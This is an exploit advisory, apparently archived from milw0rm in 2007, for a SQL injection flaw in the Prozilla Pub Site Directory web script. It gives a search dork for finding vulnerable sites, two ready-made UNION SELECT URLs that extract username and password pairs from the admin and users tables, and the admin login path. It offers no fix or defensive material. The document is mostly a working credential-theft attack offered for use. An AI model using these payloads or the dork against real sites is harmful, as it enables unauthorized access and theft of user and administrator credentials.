--==+================================================================================+==--
--==+ Prozilla Pub Site Directory SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: prozilla.com
DORK: inurl:"directory.php?cat=" pubs
DESCRIPTION:
pull out users and admins login information
EXPLOITS:
http://server.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
http://server.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/users/*
NOTE/TIP:
admin login at /siteadmin/
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !
--==+================================================================================+==--
--==+ Prozilla Pub Site Directory SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-08-06]